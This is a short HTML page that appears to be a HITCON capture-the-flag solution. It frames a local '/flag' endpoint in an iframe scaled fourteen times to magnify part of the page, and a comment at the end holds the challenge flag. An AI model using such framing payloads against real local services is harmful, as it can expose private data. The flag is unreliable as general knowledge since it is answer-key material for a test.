<!DOCTYPE html>
<html>
    <style>
     iframe {
         transform: scale(14);
         transform-origin: 1500px 330px;
     }
    </style>
    <body>
        <iframe src="http://127.0.0.1:8000/flag" width="1920" height="1080" id="x">
        </iframe>
        <script>
         document.getElementById("x").onload = () => {
         };
        </script>
    </body>
</html>
<!-- hitcon{1-1-4-1-6-1-e-9-f-9-4-c-7-3-e-4-9-7-a-7-5-d-4-6-6-c-6-3-3-7-f-4} -->
